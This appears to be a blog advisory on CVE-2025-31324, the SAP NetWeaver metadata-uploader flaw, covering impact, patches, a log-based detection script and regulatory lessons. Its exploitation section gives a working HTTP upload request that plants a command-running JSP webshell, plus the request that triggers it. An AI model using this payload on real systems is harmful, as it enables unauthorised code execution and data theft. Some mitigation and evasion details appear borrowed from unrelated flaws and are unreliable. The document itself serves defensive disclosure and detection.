
Cyber Chronicles: CVE-2025-31324 – SAP NetWeaver’s Critical File Upload Vulnerability

In the shadow of the Log4Shell Redux crisis, a new critical vulnerability emerged in April 2025, shaking enterprise cybersecurity to its core. CVE-2025-31324, a CVSS 10.0-rated flaw in SAP NetWeaver, exposed systemic weaknesses in widely used enterprise resource planning (ERP) systems, enabling unauthenticated attackers to upload malicious files and execute arbitrary code. This instalment of Cyber Chronicles dissects the technical intricacies of this vulnerability, its exploitation in active campaigns, and the urgent lessons for organisations relying on complex, interconnected software ecosystems.

Background: SAP NetWeaver’s Role in Enterprise Infrastructure

SAP NetWeaver serves as the backbone for mission-critical applications across industries, powering ERP, customer relationship management (CRM), and supply chain systems for multinational corporations, government agencies, and financial institutions. Its integration with legacy infrastructure and third-party modules makes it a high-value target for attackers seeking to disrupt business operations or exfiltrate sensitive data. By 2025, over 60% of Fortune 500 companies relied on SAP systems for core processes, amplifying the potential impact of vulnerabilities in this ecosystem.

Vulnerability Description: Anatomy of CVE-2025-31324

CVE-2025-31324 is an unauthenticated file upload vulnerability in the Metadata Uploader component of SAP NetWeaver Visual Composer. The flaw stems from inadequate authorisation checks at the /developmentserver/metadatauploader endpoint, allowing attackers to:

  1. Upload arbitrary files (e.g., JSP webshells) to vulnerable servers
  2. Execute operating system commands with the privileges of the SAP service account
  3. Establish persistent access for lateral movement or data theft

Affected versions:

  • SAP NetWeaver 7.30–7.50
  • SAP NetWeaver Visual Composer versions prior to Security Note #3594142

Technical Exploitation Breakdown

Attack Workflow

  1. Reconnaissance: Attackers scan for exposed SAP NetWeaver instances using tools like Shodan, focusing on ports 8000 (HTTP) and 50000 (HTTPS).
  2. Payload Delivery: Crafted HTTP POST requests inject malicious JSP files into the vulnerable endpoint:

     POST /developmentserver/metadatauploader HTTP/1.1
     Host: [target]
     Content-Type: multipart/form-data; boundary=816121b0328c3864

     --816121b0328c3864
     Content-Disposition: form-data; name="file"; filename="malicious.jsp"

     <%@ page import="java.util.*,java.io.*"%>
     <%
     Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
     DataInputStream dis = new DataInputStream(p.getInputStream());
     String disr = dis.readLine();
     while (disr != null) { out.println(disr); disr = dis.readLine(); }
     %>
     --816121b0328c3864--

  3. Execution: The uploaded webshell enables command execution via HTTP parameters:

     GET /malicious.jsp?cmd=whoami HTTP/1.1

Evasion Techniques Observed

  • Obfuscated JSP payloads using Base64 encoding
  • Legitimate cloud platforms (e.g., AWS, Azure) hosting attacker-controlled LDAP servers
  • Living-off-the-land tactics leveraging SAP’s disp+work.exe processes

Business Impact: When ERP Systems Become Attack Vectors

The exploitation of CVE-2025-31324 created cascading risks for affected organisations:

Risk Category          | Specific Impacts
-----------------------|------------------------------------------------------------------------------
Data Compromise        | Theft of financial records, PII, and intellectual property via SAP database access
Operational Disruption | Ransomware deployment (e.g., LockBit 5.0) encrypting SAP transaction databases
Regulatory Fallout     | Breaches of GDPR, NIS2, and Sarbanes-Oxley compliance, triggering fines up to 4% of global revenue
Supply Chain Attacks   | Pivoting from compromised SAP systems to third-party vendors and cloud environments

Case Study: A European manufacturing conglomerate suffered an AU$23 million ransomware payout after attackers exploited CVE-2025-31324 to encrypt production planning systems, halting assembly lines across 14 factories.

Mitigation Strategies: Patching, Hardening, and Beyond

Immediate Actions

  1. Apply SAP Patches
    • Implement Security Notes #3594142 (hotfix) and #3596125 (FAQ)
    • Validate installations using SAP’s SAPCAR utility
  2. Interim Workarounds

     # Disable vulnerable endpoint via SAP NetWeaver profile parameters
     icm/HTTP/server_<INSTANCE>_<xx>/server_protection = PROTECTED

  3. Network Controls
    • Block inbound traffic to /developmentserver/* paths at web application firewalls
    • Restrict outbound LDAP/RMI traffic from SAP servers
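As an added defender-side example (not code from the original post or from SAP), the following Python flags the upload-then-execute sequence from the attack workflow above in web access logs, as a detection complement to the WAF block on /developmentserver/* paths. The access-log layout, the admin allow-list and the sample lines are constructed assumptions for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed (constructed) access-log layout for this example:
# <client-ip> [<timestamp>] "<METHOD> <target> HTTP/x.y" <status>
LOG_RE = re.compile(r'^(\S+) \[([^\]]+)\] "(\w+) (\S+) HTTP/[\d.]+" (\d{3})')

# Endpoint named in the advisory text; matched case-insensitively below.
UPLOAD_ENDPOINT = "/developmentserver/metadatauploader"


def parse_line(line):
    """Return (ip, timestamp, method, target, status) or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    return ip, ts, method, target, int(status)


def detect(lines, allowed_admin_ips=frozenset()):
    """Flag the two stages described in the text and correlate them per client.

    'high'     : POST to the metadata uploader from a non-allow-listed client
    'medium'   : request for a .jsp resource carrying a cmd= parameter
    'critical' : a .jsp cmd= request from a client that uploaded earlier
    """
    findings, uploaders = [], set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, target, _status = rec
        parts = urlsplit(target)
        path, query = parts.path.lower(), parse_qs(parts.query)
        if path == UPLOAD_ENDPOINT and method == "POST" and ip not in allowed_admin_ips:
            uploaders.add(ip)
            findings.append({"ip": ip, "ts": ts, "severity": "high",
                             "reason": "unauthenticated metadata uploader POST"})
        elif path.endswith(".jsp") and "cmd" in query:
            sev = "critical" if ip in uploaders else "medium"
            findings.append({"ip": ip, "ts": ts, "severity": sev,
                             "reason": f"webshell-style request cmd={query['cmd'][0]!r}"})
    return findings


# Constructed sample lines (not real traffic) mirroring the workflow in the text.
SAMPLE_LOG = [
    '203.0.113.7 [28/Apr/2025:10:01:02 +0000] "POST /developmentserver/metadatauploader HTTP/1.1" 200',
    '203.0.113.7 [28/Apr/2025:10:01:09 +0000] "GET /malicious.jsp?cmd=whoami HTTP/1.1" 200',
    '198.51.100.4 [28/Apr/2025:10:02:15 +0000] "GET /irj/portal HTTP/1.1" 200',
    '10.0.5.20 [28/Apr/2025:10:03:00 +0000] "POST /developmentserver/metadatauploader HTTP/1.1" 200',
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG, allowed_admin_ips={"10.0.5.20"}):
        print(finding)
```

Because the endpoint requires no authentication, a POST to it from any source outside a tightly maintained admin allow-list should be treated as a patch-verification trigger, not just an alert.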

Long-Term Defence Posture

  • Zero Trust Segmentation: Isolate SAP environments from general corporate networks
  • AI-Driven Anomaly Detection: Deploy machine learning models to flag unusual SAP process activity
  • SBOM Implementation: Maintain real-time Software Bill of Materials for all SAP dependencies

Policy and Regulatory Implications

The exploitation of CVE-2025-31324 accelerated three critical shifts in cybersecurity governance:

  1. Mandatory SBOM Disclosure:
    • New EU directives require SAP vendors to provide detailed dependency trees for compliance audits
  2. 24-Hour Patching Mandates:
    • Financial regulators now demand CVE-2025-31324 patches within one business day for listed companies
  3. Cyber Insurance Reforms:
    • Insurers now exclude coverage for unpatched CVSS 10 vulnerabilities in SAP/ERP systems

Lessons for the Cybersecurity Ecosystem

  1. The Perils of Legacy Integration
    SAP’s vulnerability underscores the risks of maintaining complex, interconnected systems without modern dependency management. Organisations must prioritise:
    • Automated vulnerability scanning for ERP environments
    • Annual architecture reviews to eliminate redundant components
  2. The New Reality of SAP Security
    SAP systems can no longer be treated as “trusted internal platforms.” Best practices now demand:
    • SAP-specific EDR solutions with process-level monitoring
    • Quarterly red team exercises simulating ERP-focused attacks
  3. Global Collaboration Imperative
    The coordinated disclosure of CVE-2025-31324 between SAP, Onapsis, and Microsoft highlights the need for cross-industry threat intelligence sharing.

Conclusion: Securing the Digital Backbone

CVE-2025-31324 serves as a stark reminder that enterprise software vulnerabilities can have domino effects across global supply chains. As organisations grapple with escalating cyber risks in ERP systems, the path forward requires:

  • Proactive Patching: Treat SAP updates with the urgency of critical infrastructure maintenance
  • Holistic Monitoring: Extend threat detection to encompass business logic and transaction anomalies
  • Regulatory Vigilance: Advocate for standardised SBOM frameworks and vendor accountability clauses

The Cyber Chronicles will continue tracking how vulnerabilities in foundational platforms reshape cybersecurity priorities. Next in focus: AI-driven attack automation and the arms race in generative model security.
